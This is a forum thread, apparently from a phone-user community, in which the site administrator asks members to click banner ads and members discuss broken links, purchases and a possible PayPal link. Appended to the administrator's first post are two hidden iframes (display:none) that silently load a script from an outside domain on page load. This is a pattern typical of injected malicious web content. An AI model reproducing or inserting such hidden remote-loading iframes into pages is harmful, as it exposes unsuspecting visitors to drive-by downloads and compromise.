+ Reply to Thread

Thumbs up Support this site

In order to cover hosting expenses for this resource, I have added a banner system to this site.

Please help out by clicking the banner once per day.

Every click counts!

I am working on getting some more related sponsors for the site.

thanks in advance for your support....

Brooks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

no brooks, thank YOU for this forum!! you have helped a lot of folks out in many ways by this site.. and many more to come. i didnt even notice the banner until i read here.. i am used to banners being on websites..

I, too, didn't notice until I read the post. Thanks for the tip on clicking - I'll be sure to do it.

And, as many have already said, thanks for the site. It's been a great help for me, and for others as well. If all I need to do is to click to keep it comin', that's no problem at all!

Wink I didn't notice it either!

Maybe because when I logged into this forum, it simply says Banner 10000070 and shows the "lost link" graphic.

Good work! I find this to be a very non-intrusive banner ad!

Administrator

Arrow

heh..

i never saw that.. and still dont... :p

Administrator

Arrow

i lkes the latest ad... hey fikse, do they change every few days automaticaly, or do you switch them on your own?

I was installing a banner rotation system last night, but didn't quite finish it... the first add was based on a pay per click basis, and clearly wasn't going to generate much.... so I'm trying something else for now...

Brooks

I've been trying to support the site by clicking on the links, but most of the time I get a dead link and nothing comes up. Not just today, either, so it's not from whatever you've been working on this morning. I'd like to support the site, but I'm thinking no good comes from a broken link, so I thought I'd let you know.

Good luck getting it working!

Yeah - ad clicks are hit and miss.. I've been trying to hit an ad evertime I come here, but they tend to send me to a blank page; refresh that blank page and it comes up.
    -mark

Administrator

Arrow

i, too , hit the ad when i come online (you would get major $$$ from just my clicks!! ) but i always get the link. have not hit a broken one yet... just FYI...

widow's son
    Works fine on mine. I even went and bought a DVD from the buy.com sponsor, so hopefully part of that click or purchase helps here.

Also, I say "THANKS!" to you for this website! Ads are a welcome price to pay for having a user group of the i300 massive.

R

thanks everyone.... the previous add might have caused some "not found' errors, but this one should be fine... let me know if its not working...

Brooks

Administrator

Arrow

missed the half.com banner, but i love this new one!!! discount stuff for the i300!!! cool!!!

good job fikse!!

I have a question that is maybe obvious;

I know clicking on the banners helps the site. Should I also assume actually making a purchase will help MORE?

Just spent $106 on 1800mobiles.com, not a fortune but liked what I saw, had the incentive to help keep this great, very helpfull forum going so I did it.....................

Hi advancemeny,

The site was initally running ads which paid out on a pay-per-click basis..... but the ads were totally unrelated to the site, so I removed them and went with more related ads that are either paying for ad views up front or paying out via commissions on sales....

so clicking on the ads doesn't do anything, but making purchases like you just did, help out very much so..... thanks for your support!

Brooks

Ha! So I can stop clicking every other click thinking I'm helping?!?

Thanks everyone for a great forum!

Mark

Administrator

Arrow

thanks for that heads up fikse!

How about a paypal link? I'd gladly lob a few bucks your way to help support the site, and I'm sure others would as well.

-Patti